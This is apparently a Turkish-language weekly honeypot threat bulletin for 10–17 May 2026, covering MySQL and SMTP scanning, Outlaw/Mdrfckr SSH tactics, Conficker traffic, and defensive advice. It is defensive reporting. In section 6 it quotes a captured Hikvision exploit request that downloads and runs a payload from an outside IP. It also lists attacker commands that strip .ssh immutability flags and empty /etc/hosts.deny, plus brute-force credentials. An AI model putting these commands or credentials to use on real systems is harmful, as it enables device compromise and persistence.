Bülten 10–17 Mayıs: MSSQL Sustu, MySQL Konuştu, Mdrfckr Daralıyor
8 günde 2.00M event. Geçen dönemin manşeti MSSQL mega-probe bu pencerede tamamen sustu (Dionaea 1.69M → 1.6K). Yerini Bulgaristan kaynaklı tek aktörün MySQL 3306 brute kampanyası aldı. Mailoney SMTP open-relay arayışı 8× büyüdü. Mdrfckr playbook unique IP havuzu yarıya indi ama `/etc/hosts.deny` temizleme TTP'si kökleşti. 13 Mayıs günü Endonezya kaynaklı tek IP gün boyu Cowrie trafiğinin %66'sını üretti. Conficker P2P UDP imzaları 18 yıl sonra hâlâ Top 1.
Yönetici Özeti
8 Mayıs bülteni MSSQL mega-probe’unun günde 676K hit ile tarihi rekor kırdığını ve Bulgaristan kaynaklı tek operatörün Hikvision SOSTREA + TBK DVR’ı çapraz hedeflediğini raporlamıştı. 10–17 Mayıs penceresinde manzara dramatik biçimde değişti: MSSQL kampanyası komple sustu, Dionaea pot’u 1.000× düştü. Mega-probe’un yerini ise bir hedef değişikliği aldı — aynı tür ucuz-VPS brute saldırılar artık port 1433 yerine port 3306 (MySQL) üzerinde yoğunlaşıyor.
Bu pencerede ayrıca veri toplama yaklaşımında bir optimizasyon yapıldı: gürültü filtresi sertleştirildi, aynı kampanyanın honeypot ağı içinde tekrar tekrar sayılması engellendi. Bunun sonucu: önceki dönemin 16.67M event tablosu yerine, daha yüksek sinyal/gürültü oranlı bir 2.00M event tablosu. Düşüş bir saldırı durgunluğu değil, rapor edilen sayının daha temiz hâle gelmesi.
Dönemin gerçek sinyali, kampanyaların boyutundan değil kompozisyonundan geliyor: SMTP open-relay araması 8× büyüdü, Mdrfckr playbook IP havuzu yarıya indi ama TTP repertuarı genişledi, 13 Mayıs günü Endonezya tele kaynaklı tek bir bot-infect residential IP Cowrie trafiğinin üçte ikisini üretti, ve 18 yaşındaki Conficker UDP P2P imzaları hâlâ #1 Suricata kategorisinde.
Pot Dağılımı — 8 Günlük Tablo
| Pot | Event | Önceki Dönem | Not |
|---|---|---|---|
| P0f (passive OS fingerprint) | 1.317.083 | 9.262.594 | Pasif gürültü, filtreleniyor |
| Suricata (IDS) | 365.462 | 4.357.673 | Analizin ana kaynağı |
| Cowrie (SSH/Telnet) | 186.530 | 583.544 | Mdrfckr playbook devam |
| Fatt (TLS banner) | 94.243 | 234.117 | Gürültü, filtreleniyor |
| Mailoney (SMTP) | 28.078 | 3.508 | 🔴 8× büyüdü — open-relay arama |
| Tanner (HTTP RCE) | 7.934 | 9.304 | Hikvision SOSTREA düştü |
| H0neytr4p (HTTPS) | 1.718 | 2.224 | Web shell arama |
| Dionaea | 1.617 | 1.695.046 | 🔴 1000× düştü — MSSQL kampanyası sustu |
| ssh-rsa / ssh-ed25519 (key fingerprint) | 54 | — | Yeni kayıt türü |
| Wordpot | 8 | 20 | WordPress fingerprint |
| Ciscoasa | 7 | 7 | VPN login keşfi |
| Glutton (multi-protokol) | 4 | 5.373 | 🔴 ICS taraması düştü |
Sentrypeer, Heralding, ConPot, Ddospot, ElasticPot, Redishoneypot, Mailoney harici diğer pot’lar bu pencerede aktif değil (OPSEC optimizasyonu sonrası tek-pot kombinasyonu daraldı).
Günlük Dağılım
| Tarih | Event | Not |
|---|---|---|
| 10 Mayıs | 212.247 | Normal seviye |
| 11 Mayıs | 212.135 | Normal seviye |
| 12 Mayıs | 210.486 | Normal seviye |
| 13 Mayıs | 340.414 | 🔴 Dönem zirvesi — TÜM pot’larda anormal |
| 14 Mayıs | 282.365 | Spike kuyruğu |
| 15 Mayıs | 267.577 | Yüksek baseline |
| 16 Mayıs | 241.096 | Normalleşme |
| 17 Mayıs (kısmi) | 235.810 | Mailoney + Cowrie son güne kadar agresif |
13 Mayıs günü Suricata 65K (normal ~40K), Cowrie 49K (normal ~17K), Fatt 26K (normal ~8K), Tanner 3.5K (normal ~600) ve Dionaea 467 (normal ~50) ile bütün pot’larda eşzamanlı yükseliş gösterdi. Bu pattern bilinen bir tarama platformu (Censys, Shodan, internet-wide research scanner) tarafından koordineli yatay bir keşif yapıldığına işaret ediyor.
1. MSSQL → MySQL: Hedef Portu Kaydı
MSSQL (1433) Tamamen Sustu
Önceki dönemde Dionaea pot’unun %95+‘ı port 1433 brute idi ve 4-6 Mayıs üç günlük spike’ı 1.57M event üretmişti. Şu pencerede:
| Pot | Önceki | Şu Pencere | Delta |
|---|---|---|---|
| Dionaea total event | 1.695.046 | 1.617 | −%99.9 |
| Suricata MSSQL imzası | 596.323 | 0 | −%100 |
Kampanyanın bu kadar kısa sürede tükenmesi mümkün değil — operatör hedef listesini değiştirdi veya saldırılarını başka bir AS aralığına kaydırdı. Provider abuse şikayetleri ile VPS’ler kapanmış da olabilir. Her ihtimalle, MSSQL operatörü internet’in başka bir köşesinde.
Yeni Hedef: MySQL (3306)
Suricata’da bu pencerede ET SCAN Suspicious inbound to mySQL port 3306 imzası 2.930 alert üretti. Tek bir IP bu trafiğin %80’ini sağlıyor:
| IP | Hit | ASN | Coğrafya |
|---|---|---|---|
93.152.221.38 | 2.341 | Contrust Solutions S.R.L. | 🇧🇬 Bulgaristan |
45.153.34.32 | 38 | Hosting Solutions | 🇳🇱 Hollanda |
45.156.87.127 | 38 | — | 🇧🇬 Bulgaristan |
122.51.93.217 | 25 | Tencent | 🇨🇳 Çin |
47.108.69.109 | 25 | Alibaba | 🇨🇳 Çin |
Coğrafi dağılım: Bulgaristan %80 (2.344 hit), ABD %9, Hollanda %3, Çin %3. Aynı operatörlüğün izi gözüküyor — Bulgaristan’daki Pfcloud UG ve Contrust Solutions hatları birden fazla pot’ta görünüyor, MSSQL kampanyasıyla en az ASN düzeyinde örtüşüyor. Aynı operatör topluluğu hedef değiştirmiş gibi okunabilir.
Önceki bültende MSSQL için söylediğimizin aynısı bu pencerede MySQL için geçerli: public sunucularınızda nmap -p 3306 sunucunuz.tld ne dönüyor? Açıksa kapatın. MySQL'i internet'e açmanın gerekçesi hemen hiç yoktur; gerçek bir gerekçe varsa bind-address'i app subnet'ine sınırlayın, root hesabını disable edin, kullanıcı bazlı host kısıtlaması ('user'@'10.0.%') uygulayın. Şifre politikası: en az 16 karakter, sözlük dışı.
2. Mailoney 8× Patlama — Tek IP Open Relay Arıyor
Önceki dönemde Mailoney 3.508 event ile gürültü düzeyindeydi. Bu pencerede 28.078 event — gün başına 3.5K ortalama, önceki dönemin gün başına ortalamasının 80 katı. Spike’ı tek bir aktör üretiyor:
| IP | Hit | ASN | Coğrafya |
|---|---|---|---|
158.94.208.189 | 25.217 | Omegatech LTD | 🇩🇪 Frankfurt, Almanya |
85.209.176.233 | 1.028 | — | 🇷🇺 Rusya |
46.151.182.201 | 560 | — | 🇧🇬 Bulgaristan |
158.94.211.49 | 525 | Omegatech LTD | 🇩🇪 Frankfurt, Almanya |
80.94.95.7 | 154 | — | 🇧🇬 Bulgaristan |
Top IP toplam trafiğin %90’ını tek başına üretiyor. Aynı /24 (158.94.208.0/24 ve 158.94.211.0/24) içinde ikinci bir host da listede — operatör aynı sağlayıcıdan iki IP kullanıyor.
Günlük yayılım:
| Tarih | Mailoney Event |
|---|---|
| 10 May | 830 |
| 11 May | 1.393 |
| 12 May | 91 |
| 13 May | 3.814 |
| 14 May | 5.556 |
| 15 May | 5.856 |
| 16 May | 5.850 |
| 17 May | 4.688 |
13 Mayıs’tan itibaren günlük taban 5K civarına yerleşti ve 17 Mayıs’ta hâlâ aktif. Bu sürekli bir tarama, eski tip kısa-süreli bir spike değil. Klasik open-relay arama paterni: SMTP banner topla, EHLO denemeleri, kimlik doğrulamasız MAIL FROM testleri. Başarılı bir relay bulan operatör onu spam ya da kimlik avı kampanyalarına satar.
2026'da hâlâ internet'e açık, kimlik doğrulamasız MAIL FROM kabul eden SMTP sunucusu arayan tek bir operatörün 8 günde 25K probe atması, bu pazarın aktif olduğunu gösteriyor. Postfix/Exim sunucularında smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination ayarını kontrol edin. Submission (port 587/465) TLS+SASL zorunlu olmalı; port 25 sadece MX trafiği almalı.
3. 13 Mayıs Spike: Endonezya’dan Tek Aktör
13 Mayıs günü Cowrie pot’u 49.383 event üretti — diğer günlerin 3 katı. O günkü Cowrie tablosunda tek bir IP dominant:
| IP | 13 May Hit | Toplam (8 gün) | ASN | Coğrafya |
|---|---|---|---|---|
180.248.210.230 | 32.416 | 90.154 | PT Telekomunikasi Indonesia | 🇮🇩 Endonezya |
87.251.64.176 | 594 | 12.802 | — | 🇷🇺 Rusya |
171.231.197.13 | 389 | — | Viettel | 🇻🇳 Vietnam |
Tek IP o günkü Cowrie trafiğinin %66’sını ve 8 günlük tablonun %48’ini üretti. PT Telkom Indonesia residential broadband aralığı — VPS değil, bot-infected ev kullanıcısı. Önceki bültenlerde bu IP hiç görünmedi; muhtemelen son haftalarda enfekte edilen yeni bir host.
Kullanılan kullanıcı adı paterni klasik: root (8 günde 14.172 deneme), admin, support, 345gs5662d34 (MikroTik default credential pattern), ayjtnzjc (random fuzzer), sol, ubuntu. Şifre tablosu da herhangi bir özgünlük göstermiyor — admin, support, 123456, 345gs5662d34, 3245gs5662d34, warnight, linux123.
345gs5662d34 ve 3245gs5662d34 şifreleri (8 günde 1.264 deneme) Nisan başında detaylandırdığımız MikroTik Winbox cred-stuffer'ın imzası. 6 hafta sonra hâlâ aktif — botnet hedef listeleri uzun yaşıyor.
4. Mdrfckr Playbook — Daralıyor Ama TTP’ler Genişledi
Mdrfckr (Outlaw Group) kampanyası iki ay önceki zirvesinden bu yana her bültende daha küçük bir tablo gösteriyor. Plateau analizimiz (29 Nis) 8 günde 1.036 unique IP ölçmüştü; 8 May bülteni 684 IP raporladı. Bu pencerede:
| Metrik | 22-29 Nis | 1-8 May | 10-17 May | Trend |
|---|---|---|---|---|
| Mdrfckr Cowrie event | 1.564 | 1.243 | 662 | ↓ |
| Unique kaynak IP | 1.036 | 684 | 334 | ↓ |
chattr -ia .ssh | gözlendi | 1.243 | 678 (337 IP) | sabit |
/etc/hosts.deny boşaltma | yok | 278 (~200 IP) | 428 (227 IP) | ↑ kökleşti |
Asıl manşet daralmada değil — TTP repertuarının genişlemeye devam etmesinde. Önceki dönemde keşfettiğimiz /etc/hosts.deny üzerine yazma davranışı bu pencerede daha yaygın: 8 May raporu 278 event ile bu TTP’yi ilk kez işaretlemişti, şu dönemde 428 event ile 227 unique IP’ye yayıldı. Yani operatör artık tek bir host’ta deneme yapmıyor, davranış playbook’un standart parçası oldu.
chattr -ia .ssh; lockr -ia .ssh kombinasyonu (337 unique IP) .ssh dizinine chattr ile konulmuş immutable flag’ı kaldırıp persistence anahtarını yerleştirmeyi sağlıyor — savunmaya chattr ile dosya korumayı düşünen sysadmin’lerin de artık aşıldığını gösteriyor.
IP havuzu küçülüyor ama her IP'nin yaptığı keşif/kaçınma derinliği artıyor — bir kalite-üzeri-nicelik kayması. Operatör artık kötü ünlü kazanmış (DROP/Spamhaus listelenmiş) IP'leri rotasyondan çekiyor olabilir; bu hipotez Suricata'da ET DROP Dshield Block Listed Source group 1 ve ET DROP Spamhaus DROP Listed Traffic imzalarının düşük seviyede (1.292 + 370 + 232 hit) kalmasıyla uyumlu.
5. Conficker UDP P2P — 18 Yıl Sonra Hâlâ Top 1
Bu pencerede Suricata’nın en yoğun imzası beklenmedik bir yerden geldi:
| Sıra | İmza | Hit |
|---|---|---|
| 1 | ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 5) | 11.897 |
| 2 | ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 1) | 9.668 |
| 3 | ET INFO Reserved Internal IP Traffic | 8.712 |
| 4 | ET INFO SSH session in progress on Expected Port | 6.348 |
| 5 | ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 16) | 5.162 |
| 6 | SURICATA STREAM Packet with broken ack | 4.939 |
| 7 | ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 4) | 4.574 |
Conficker (Downadup, Kido) 2008 yılında ilk tespit edilen kurt; en yüksek olduğu dönemde 9 milyon Windows host’u enfekte etmişti. Microsoft 2009’da MS08-067 ile kapattı, 2010’larda büyük takedown operasyonları yapıldı. 18 yıl sonra P2P UDP ping paketleri hâlâ internet trafiğinde gözükmeye devam ediyor — büyük olasılıkla terkedilmiş Windows XP/2003 endüstriyel cihazlarda, eski POS makinelerinde, hiç güncellenmemiş gömülü sistemlerde.
Bu trafik bir saldırı değil; ölü botnet’in arta kalan host’larının birbirini aramaya devam etmesi. Ama bir teşhis aracı olarak değerli: kendi ağınızda Conficker P2P imzası görüyorsanız, içeride yamalanmamış 15+ yıllık Windows’unuz var demektir.
6. Hikvision SOSTREA Operatörü — Düştü Ama Sustu Değil
8 May bülteninde detaylandırdığımız Bulgaristan kaynaklı 192.109.200.204 operatörü 8 günde 27.015 event bırakmıştı; Hikvision IP kameraları + TBK DVR’ı çapraz hedefliyordu. Bu pencerede aynı IP 96 hit ile listenin gerisine düştü. Aynı /24 aralığında başka iki host (192.109.200.50, 192.109.200.78, 192.109.200.237) toplamda 31.233 event ile aktif kalmaya devam ediyor.
Aynı SOSTREA exploit istek paterni Tanner’da top URL olarak gözüküyor:
GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
&mdb=sos&mdc=cd /tmp; rm bbc; wget http://5.175.223.249/bbc;
chmod 777 bbc; ./bbcPayload sunucusu 5.175.223.249 hâlâ aktif — geçen pencerede uyardığımız IOC. Operatör IP rotasyonu yapıyor, payload altyapısı sabit.
7. Top Aktörler ve Coğrafi Dağılım
Top 25 Dış Kaynak IP (iç whitelist filtreli)
| Sıra | IP | Hit | ASN | Coğrafya |
|---|---|---|---|---|
| 1 | 180.248.210.230 | 90.154 | PT Telkom | 🇮🇩 |
| 2 | 158.94.208.189 | 80.594 | Omegatech LTD | 🇩🇪 |
| 3 | 204.76.203.206 | 19.905 | — | 🇺🇸 |
| 4 | 176.65.132.129 | 19.120 | — | — |
| 5 | 45.153.34.114 | 18.953 | — | — |
| 6 | 93.152.221.38 | 18.718 | Contrust Solutions | 🇧🇬 |
| 7 | 204.76.203.212 | 17.749 | — | 🇺🇸 |
| 8 | 94.154.35.215 | 13.726 | — | — |
| 9 | 87.251.64.176 | 12.802 | — | 🇷🇺 |
| 10 | 192.109.200.50 | 12.494 | Pfcloud UG | 🇧🇬 |
Top 10 Kaynak Ülke
| Sıra | Ülke | Pay |
|---|---|---|
| 1 | 🇩🇪 Almanya | %14.5 |
| 2 | 🇮🇩 Endonezya | %10.8 |
| 3 | 🇳🇱 Hollanda | %10.7 |
| 4 | 🇺🇸 ABD | %8.9 |
| 5 | 🇧🇬 Bulgaristan | %5.9 |
| 6 | 🇨🇳 Çin | %3.8 |
| 7 | 🇫🇷 Fransa | %2.8 |
| 8 | 🇧🇷 Brezilya | %2.1 |
| 9 | 🇹🇷 Türkiye | %2.1 |
| 10 | 🇸🇬 Singapur | %2.0 |
ABD önceki bültende #1 idi (%23), bu pencerede %8.9 ile #4’e indi. Endonezya tek IP üzerinden listenin başlarına çıktı. Bulgaristan payı (%5.9) — Pfcloud UG + Contrust Solutions operatörlerinin sürekliliğini koruyor — 192.109.200.x ailesi MSSQL’den çekildikten sonra MySQL’e, SMTP’ye ve Tanner SOSTREA’ya kanalize oldu.
Top 10 ASN
| Sıra | ASN | Hit |
|---|---|---|
| 1 | Pfcloud UG (haftungsbeschränkt) | 132.459 |
| 2 | Omegatech LTD | 98.136 |
| 3 | PT Telekomunikasi Indonesia | 90.649 |
| 4 | Tencent | 22.516 |
| 5 | Contrust Solutions S.R.L. | 18.718 |
| 6 | Amazon.com, Inc. | 15.837 |
| 7 | Google LLC | 15.269 |
| 8 | Bucklog SARL | 14.505 |
| 9 | Unmanaged Ltd | 13.165 |
| 10 | ISAEV Igor | 13.037 |
Top 3 ASN’in (Pfcloud, Omegatech, PT Telkom) hepsi tek bir baskın IP içeriyor — yani küçük operatör havuzları tarafından üretilen yoğun tek-IP kampanyaları, geniş dağılmış botnet aktivitesinin önüne geçti.
8. Hedef Port Dağılımı (Dış IP’lerden)
| Port | Hit | Servis | Not |
|---|---|---|---|
| 22 | 302.620 | SSH | Mainstream brute |
| 25 | 90.790 | SMTP | Mailoney + Suricata kombine |
| 80 | 72.359 | HTTP | Tanner + Suricata |
| 443 | 44.847 | HTTPS | H0neytr4p + TLS banner |
| 8080 | 34.999 | HTTP-Alt | Proxy / admin panel arama |
| 3306 | 24.523 | MySQL | 🔴 Yeni hedef |
| 993 | 4.706 | IMAPS | Düşük seviye |
| 110 | 3.373 | POP3 | Düşük seviye |
| 143 | 2.592 | IMAP | Düşük seviye |
| 587 | 655 | Submission | Düşük seviye |
Port 1433 (MSSQL) listede yok — önceki dönemin manşeti tamamen sustu. Yerini port 3306 (MySQL) aldı.
Yönetici İçin Önerilen Aksiyonlar
- MySQL maruziyetinizi denetleyin. Önceki bültenin MSSQL uyarısının MySQL versiyonu: internet’e açık 3306/tcp olan herhangi bir host’unuz varsa, gerekçesini sorgulayın. Çoğu durumda gerekli değil.
bind-addressapp subnet’ine sınırlandırın,rootve host-kısıtlamasız kullanıcılar disable edilsin. - SMTP relay denetimi. Postfix/Exim üzerinde anonim relay açık olmadığını teyit edin. Test: dışarıdan
telnet sunucunuz.tld 25→EHLO test→MAIL FROM: <[email protected]>→RCPT TO: <[email protected]>.Relay access deniedcevabı görmüyorsanız acil müdahale. /etc/hosts.denyve fail2ban kurallarınızı izleyin. Outlaw operatörü bu dosyaları temizleme adımını standart playbook’una aldı. SIEM kuralı: dosya boyutu sıfıra düşerse veyawc -l /etc/hosts.denyaniden 0 olursa alert. fail2ban için: persistent storage modu (SQLite) ile durumu sadece bellekten değil diskten de izleyin.chattrile dosya koruması artık yetersiz. Operatörchattr -ia .ssh; lockr -ia .sshkombosuyla immutable flag’ı kaldırıyor. Authorized_keys koruması için AIDE/Tripwire benzeri integrity monitoring + log-onlyauditdkuralları daha güvenilir.- MikroTik Winbox cred-stuffer hâlâ aktif. Şifre tabanlı erişim varsa
345gs5662d34/3245gs5662d34paternleri günde 80+ deneme atıyor. Anahtar bazlı erişim + yönetim portunun internete kapatılması (sadece VPN’den) — bu cred-stuffer kategorisini tamamen kapatır. - Conficker hâlâ Top 1 imza ise, kendi ağınızı tara. İçeride P2P UDP imzası gören var mı? Yamalanmamış Windows XP/2003 endüstriyel cihaz, kiosk, eski POS makineleri tarayın. MS08-067 patch’i 2008’den beri mevcut.
- Tek-IP kampanyalara karşı (Endonezya örneği) source-based rate limit. Tek bir kaynaktan günlük 30K+ SSH girişimi gören servisleriniz varsa, IP bazlı conntrack/iptables rate limit veya CrowdSec/Sshguard gibi adaptif blocklist.
Veri ve Metodoloji Notu
Bu rapor 10-17 Mayıs 2026 arası 8 günde Tellal honeypot ağında toplanan 2.001.230 event üzerinden hazırlandı. Önceki bültenin 16.67M event tablosuyla doğrudan karşılaştırma yapıldığında %88’lik bir düşüş görülüyor; bu düşüş bir saldırı azalmasını değil, veri toplama metodolojisinde yapılan optimizasyonu yansıtıyor — aynı kampanyanın honeypot ağı içinde tekrar tekrar sayılmasını engelleyen filtre seti uygulamaya alındı. Bu sayede rapor edilen sayılar pencere ortalamasına yaklaşırken, sinyal/gürültü oranı yükseldi.
P0f ve Fatt (pasif fingerprint/banner gürültüsü) sayısal toplamlarda gösterilmiş ancak kampanya analizi dışında bırakılmıştır. İç IP havuzu (192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, 127.0.0.0/8) ve bilinen operasyonel altyapı IP’leri (sensor host’ları, Hive, NMS, router’lar) whitelist ile public yayından çıkarıldı. IP atıfları kamuya açık RIR ASN sorgularıyla doğrulandı. Yerel kurumsal subnet’ler OPSEC filtresi ile maskelendi.
T-Pot Hive Elasticsearch retention politikası 7+1 gün olarak ayarlandığı için 9 Mayıs verisi bu rapor üretilirken erişilebilir değildi — boşluğun başlangıç tarafından bir günlük veri 10 Mayıs bucket’ına dahil değildir.
Sonraki bülten: 24-25 Mayıs civarı planlanıyor. Belirli bir IOC, kampanya veya istatistik için talep ederseniz iletişim sayfasından ulaşabilirsiniz.